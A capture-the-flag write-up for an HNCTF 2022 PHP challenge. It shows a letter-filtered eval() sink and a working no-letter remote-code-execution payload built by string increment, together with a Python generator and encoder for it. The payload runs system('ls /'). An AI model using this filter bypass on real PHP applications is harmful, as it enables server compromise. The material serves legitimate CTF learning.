[HNCTF 2022 Week1]Challenge__rce
The page opens blank. Viewing its HTML source, a comment hints that we can pass a parameter via /?hint=.
Requesting the page with any value for hint (for example /?hint=1) makes the PHP source appear:
<?php
error_reporting(0);
if (isset($_GET['hint'])) {
highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
$rce = $_POST['rce'];
if (strlen($rce) <= 120) {
if (is_string($rce)) {
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
eval($rce);
} else {
echo("Are you hack me?");
}
} else {
echo "I want string!";
}
} else {
echo "too long!";
}
}
This is a no-letter RCE: the regex rejects a-zA-Z, so no function name can be written literally, and it also rejects ~, ^, quotes, backslash, backtick, /, < ? > and similar. The three usual ways to build a string without letters are bitwise NOT (~), XOR (^) and string increment (++).
Since ~ and ^ are both filtered here, only the increment trick is left. The characters $ _ = [ ] . ; + ( ) and digits are all allowed, which is enough.
Because of the 120-byte limit we should not spell out "system" and its argument by increment. Instead the payload builds only the string "_GET" and then reads the function name and the argument from GET parameters, which keeps the POST body short and lets us run any command by changing the URL.
payload:
POST body (URL-encoded):
rce=%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B%20
which decodes to (118 bytes, under the 120 limit, and with no letter or other filtered character):
$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);
Step by step:
$_=[]._;          array-to-string conversion gives "Array", the bare constant _ gives "_" (with a warning on PHP 7), so $_ = "Array_"
$__=$_[1];        $__ = "r"
$_=$_[0];         $_ = "A"
$_++;$_1=++$_;    "A" -> "B" -> "C", and $_1 = "C"
$_++; x4          "C" -> "G"
$_=$_1.++$_.$__;  "C" . "H" . "r" = "CHr"; PHP function names are case-insensitive, so $_("...") calls chr()
$_=_.$_(71).$_(69).$_(84);   "_" . chr(71) . chr(69) . chr(84) = "_GET"
$$_[1]($$_[2]);   under PHP 7+ variable syntax this is ${$_}[1](${$_}[2]) = $_GET[1]($_GET[2])
Note that reading the undefined constant _ throws an Error on PHP 8, so the []._ trick assumes the target runs PHP 7.
GET (query string on the same request; the space in the command should be sent as %20):
?1=system&2=ls /
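The construction above, reproduced as an added example (not part of the original writeup): a small Python script that emits the same increment-based PHP payload, ports the challenge's preg_match() character class to Python's re so the payload can be checked offline against the filter and the 120-byte limit, and URL-encodes it as the rce= form field. The parameter names 1 and 2 are the ones the writeup uses; the generator is written so other letters could be reached by more ++ steps.

```python
"""Build and check the no-letter PHP payload used against the challenge filter."""
import re
from urllib.parse import quote

# Port of the challenge's preg_match() character class to Python's re.
FILTER = re.compile(r"[!@#%^&*:'\-<?>\"/|`a-zA-Z~\\]")
MAX_LEN = 120


def steps_to(letter: str) -> int:
    """Number of ++ operations that move the one-letter PHP string "A" to `letter`."""
    return ord(letter.upper()) - ord("A")


def build_payload(func_param: str = "1", arg_param: str = "2") -> str:
    """Return PHP code calling $_GET[func_param]($_GET[arg_param]) without any letter."""
    parts = []
    # [] . _  -> "Array_": "Array" from array-to-string conversion, "_" from the bare
    # constant _ (a warning on PHP 7; PHP 8 throws Error for undefined constants).
    parts.append("$_=[]._;")
    parts.append("$__=$_[1];")        # $__ = "r"
    parts.append("$_=$_[0];")         # $_  = "A"
    # "A" -> "C": post-increments, then one pre-increment whose value is kept in $_1.
    parts.append("$_++;" * (steps_to("C") - 1))
    parts.append("$_1=++$_;")         # $_1 = "C"
    # "C" -> "H": post-increments, the last step done inline below as ++$_.
    parts.append("$_++;" * (steps_to("H") - steps_to("C") - 1))
    parts.append("$_=$_1.++$_.$__;")  # "C" . "H" . "r" = "CHr" (calls chr(), names are case-insensitive)
    # _ . chr(71) . chr(69) . chr(84) -> "_GET"
    codes = ".".join(f"$_({ord(c)})" for c in "GET")
    parts.append(f"$_=_.{codes};")
    # $$_[1]($$_[2]) parses as ${$_}[1](${$_}[2]) -> $_GET[1]($_GET[2]) on PHP 7+
    parts.append(f"$$_[{func_param}]($$_[{arg_param}]);")
    return "".join(parts)


def check_payload(payload: str) -> dict:
    """Mirror the server-side checks; `bad` lists the characters the regex would reject."""
    return {
        "length": len(payload),
        "length_ok": len(payload) <= MAX_LEN,
        "bad": sorted(set(FILTER.findall(payload))),
    }


def post_body(payload: str) -> str:
    """URL-encode the payload as the rce= form field of the POST body."""
    return "rce=" + quote(payload, safe="")


if __name__ == "__main__":
    p = build_payload()
    print(p)
    print(check_payload(p))
    print(post_body(p))
```

Run it and send the printed body with POST to /?1=system&2=ls%20/; check_payload() reports 118 bytes and an empty `bad` list, while a naive `system('ls');` is rejected for every letter plus the quote.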